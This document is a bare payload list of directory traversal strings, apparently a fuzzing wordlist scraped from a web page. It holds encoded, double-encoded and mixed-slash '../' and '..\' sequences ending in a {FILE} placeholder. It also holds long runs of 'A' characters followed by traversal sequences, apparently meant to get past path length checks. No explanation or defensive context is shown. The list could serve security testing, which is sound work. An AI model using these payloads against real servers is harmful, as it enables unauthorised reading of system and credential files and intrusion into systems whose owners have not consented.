%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
